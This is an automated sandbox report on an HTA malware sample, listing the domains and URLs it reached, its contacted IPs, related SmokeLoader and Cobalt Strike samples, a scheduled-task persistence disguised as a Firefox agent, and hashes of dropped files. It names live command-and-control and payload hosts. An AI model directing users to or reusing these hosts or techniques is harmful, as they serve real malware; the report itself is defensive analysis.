                                                                        https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-yearsexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://prolinice.ga/explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                unknown
                                                                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://go.micropowershell.exe, 00000001.00000002.1442591521.00000000050B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.microsoft.powershell.exe, 00000003.00000002.1336183059.00000000086C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&ocexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://aka.ms/pscore6LRpowershell.exe, 00000008.00000002.2180174511.0000000005299000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.ecosia.org/newtab/explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://word.office.com576explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://172.245.135.166/600/seethpowershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://prolinice.ga/)explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                unknown
                                                                                                https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF1powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://excel.office.comEexplorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 0000000E.00000003.2162007420.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/aexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://prolinice.ga/;explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                              unknown
                                                                                                              http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1995400275.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1997904056.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2535368092.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2112839505.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2535747935.0000000002CF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2535507694.0000000000450000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2536095977.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2535527789.0000000000C09000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                unknown
                                                                                                                https://api.msn.com/$explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    172.245.135.166
                                                                                                                    unknownUnited States
                                                                                                                    36352AS-COLOCROSSINGUSfalse
                                                                                                                    142.250.186.78
                                                                                                                    drive.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    142.250.185.193
                                                                                                                    drive.usercontent.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    45.91.8.152
                                                                                                                    prolinice.gaRussian Federation
                                                                                                                    208626SERV-TECHRUtrue
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1539853
                                                                                                                    Start date and time:2024-10-23 08:13:42 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 8m 30s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:32
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:veryeasythingsevermadeforcreatenewthignsbetterthigns.hta
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.bank.troj.spyw.expl.evad.winHTA@42/37@3/4
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 70.6%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 98%
                                                                                                                    • Number of executed functions: 176
                                                                                                                    • Number of non-executed functions: 85
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .hta
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 7744 because there are no executed function
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6128 because it is empty
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7848 because it is empty
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
                                                                                                                    • Execution Graph export aborted for target wihaduv, PID 1556 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    TimeTypeDescription
                                                                                                                    02:14:37API Interceptor224x Sleep call for process: powershell.exe modified
                                                                                                                    02:15:37API Interceptor2263x Sleep call for process: explorer.exe modified
                                                                                                                    02:15:58API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                    08:15:40Task SchedulerRun new task: Firefox Default Browser Agent AE69D5B144DD2D95 path: C:\Users\user\AppData\Roaming\wihaduv
                                                                                                                    No context
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    prolinice.gaSecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 185.251.91.119
                                                                                                                    40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 185.251.91.119
                                                                                                                    #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 77.232.129.190
                                                                                                                    171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 77.232.129.190
                                                                                                                    #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 77.232.129.190
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    SERV-TECHRUtx6lJfVP3c.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Xmrig, zgRATBrowse
                                                                                                                    • 45.91.8.197
                                                                                                                    dFagySOU5B.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Xmrig, zgRATBrowse
                                                                                                                    • 45.91.8.197
                                                                                                                    aXCZLdgtmG.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Xmrig, zgRATBrowse
                                                                                                                    • 45.91.8.197
                                                                                                                    J7KkkQ9RRb.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Xmrig, zgRATBrowse
                                                                                                                    • 45.91.8.197
                                                                                                                    code9.exeGet hashmaliciousDanaBotBrowse
                                                                                                                    • 45.8.157.91
                                                                                                                    code9.exeGet hashmaliciousDanaBotBrowse
                                                                                                                    • 45.8.157.91
                                                                                                                    setup.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 45.91.8.184
                                                                                                                    file.exeGet hashmaliciousTofseeBrowse
                                                                                                                    • 45.91.8.224
                                                                                                                    file.exeGet hashmaliciousTofseeBrowse
                                                                                                                    • 45.91.8.224
                                                                                                                    file.exeGet hashmaliciousTofseeBrowse
                                                                                                                    • 45.91.8.224
                                                                                                                    AS-COLOCROSSINGUSseethemagicalpersoninmylifewithherlifegoodforme.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                                    • 172.245.123.45
                                                                                                                    seethefirstthingstobeinentirethingstobegoodfro.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 172.245.123.34
                                                                                                                    niceworkingwithgreatthingstobeonlineforgoodthing.htaGet hashmaliciousCobalt Strike, AgentTesla, PureLog StealerBrowse
                                                                                                                    • 192.3.101.157
                                                                                                                    creambungoodforyourchoicetogetmeback.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 107.175.229.138
                                                                                                                    logicalwayofgreatthingswhichcreatedwithgreatwayofgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 192.3.176.141
                                                                                                                    createdbestthingswithnewthingsgreatattitudewithnewthignsonherewithme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 192.210.215.8
                                                                                                                    ugetsharpresultsalwaysfromthegreatfileworksure.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 198.144.178.173
                                                                                                                    seethedifferentwithhereloverandreality.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 192.3.179.174
                                                                                                                    greatwayforbestthignswithwhonotwanttodo.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 192.3.176.141
                                                                                                                    userhergoodthingswithmeforgetbestthingsgoodforme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 198.144.178.173
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eseethebestthingshavwithgreatthingsformetoget.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    greatworkwithnewthingstobegreatthignswithmehave.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    nicethingswithgreatthingsentirethingsgoodthingsgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    logicalwayofgreatthingswhichcreatedwithgreatwayofgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    createdbestthingswithnewthingsgreatattitudewithnewthignsonherewithme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    seethedifferentwithhereloverandreality.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    greatwayforbestthignswithwhonotwanttodo.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    seethebestthingsformygirlshegreatfornewways.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    verynicegirlneedsuperkiisingfromtheboy.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    sheisthebestcaseeveryoneknowbesththignstobegreatfor.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                    • 142.250.186.78
                                                                                                                    • 142.250.185.193
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    C:\Users\user\AppData\Roaming\wihaduvMT_BURAAQ_FINAL_DRAFT_BL_RFQ32400909909_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      PAYMENT_SWIFT_REFHSBC029999018728929000187928311119281-PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65536
                                                                                                                        Entropy (8bit):0.9433601432116723
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:bRT8qeC6KQ0LZTkrjyaVwzuiFAZ24lO8k:WjCvrLZTWjKzuiFAY4lO8k
                                                                                                                        MD5:CE51F9FB446B713912BB5B8ECBE396AB
                                                                                                                        SHA1:CF8EE46A45858B42CDA36DC313541D711BB2A66A
                                                                                                                        SHA-256:B033DA5696FC10C83109691D973EC19FFBFEE6850347FFBC6DBDFD6F41007ABE
                                                                                                                        SHA-512:BEE320529AA7154FD41DB10B03D6DA87E11486F37979AA2E515523D68F9D945997D875A3AF832794FF496A9C79103BFFC885E9FF915BC09A52463889A0586762
                                                                                                                        Malicious:false
                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.1.3.7.7.5.0.2.9.8.5.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.1.3.7.7.5.1.6.2.6.6.3.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.4.e.c.c.5.3.-.8.d.1.a.-.4.5.6.6.-.8.3.1.5.-.d.b.5.a.6.6.4.8.e.0.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.1.1.d.6.7.c.-.2.4.a.9.-.4.6.1.5.-.8.1.6.8.-.a.9.c.8.1.f.1.b.5.4.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.8.8.-.0.0.0.1.-.0.0.1.3.-.5.8.8.d.-.c.3.0.0.1.3.2.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.
                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Wed Oct 23 06:15:50 2024, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):58886
                                                                                                                        Entropy (8bit):1.5464975092081004
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:t+tLysN67tO2pxdsNbnfr71fkTqmNyjQQmX:QtWs7ubshnfr7BVQj
                                                                                                                        MD5:2BE9A9339F75CD29C43A95DE18159749
                                                                                                                        SHA1:7318298EE6F1E1FF0EFE4B7BA9BA27EFAC5CF0B8
                                                                                                                        SHA-256:3A7A4A6233DD7812EE1CDC539128D15D5CACDCAF2C29ABA66BD1B0CD60ABCCBE
                                                                                                                        SHA-512:EDE151F967910FF7CD6A4248DDE84D17BD05A76BA4A399A3EC0F8207F3D6F71D07936F84D06CEA99B563D91896436C0A3BD07E0490880263C6F9ECD3D9DB201F
                                                                                                                        Malicious:false
                                                                                                                        Preview:MDMP..a..... ..........g.........................................7..........T.......8...........T...........0...............L...........8...............................................................................eJ..............Lw......................T..............g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8556
                                                                                                                        Entropy (8bit):3.6926257815490358
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:R6l7wVeJtTdW6YWUGgmfqtjbzpDT89bp69finDm:R6lXJ5c6YlGgmfqtj+pIfh
                                                                                                                        MD5:CCFDAEEDAB24F3957343CBCB8C569806
                                                                                                                        SHA1:AD2071752CDDD1F0CC75C04789F85942C13116BB
                                                                                                                        SHA-256:0E184A57C10C2E81A46156D3E70BA3919B240BAAD8F634AEE00879CEE7537DD5
                                                                                                                        SHA-512:86AB434B041CFEA709C8596FA53FE43531B18096036462927885B8161A9370B9B4B915588DD4DABE8C4806A04905EA3499056310CB00A25A11932DE2ED7AD98A
                                                                                                                        Malicious:false
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.2.<./.P.i.
                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4719
                                                                                                                        Entropy (8bit):4.454646200250732
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwWl8zs+NJg771I90/WpW8VYFYm8M4JYcFyyq85Mcnb9Q3fd:uIjf+nI77u7VBJqonba3fd
                                                                                                                        MD5:98702988ED4C9910CDDB249C17BB2005
                                                                                                                        SHA1:565E53E74B96D4912DA50542ADBEABFE908C12F8
                                                                                                                        SHA-256:70FF2052FCD69AF50B9E58928BC278FA0221BA563A6F517DF7419268B81EACF7
                                                                                                                        SHA-512:FBC3388DF543B41617F4296391E9DD862230C0F769BFBF4CE30BA50A92E1C25BDA52F579AE3DABF3AE48C4D00E830203682970485CF2C9EE3B6F6C9AAA09E9AA
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="555678" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                        Process:C:\Users\user\AppData\Roaming\wihaduv
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):311
                                                                                                                        Entropy (8bit):5.347482639021185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
                                                                                                                        MD5:1AC8524D3800CDD5A91A864BCD4C3AB5
                                                                                                                        SHA1:D003AEE44AC954938CE83E4A80412E04F726EA83
                                                                                                                        SHA-256:8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
                                                                                                                        SHA-512:9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
                                                                                                                        Malicious:false
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):140570
                                                                                                                        Entropy (8bit):3.699365257334415
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:WSb0qgt5pzFGwNHijRyr0eoTozYA5qx8QeT/nJuMW2BZSp4FDIKF4Gc1IIzZWlTh:WSbNgt5pJGwNXTvclvrcZ5JIC6Vo+0
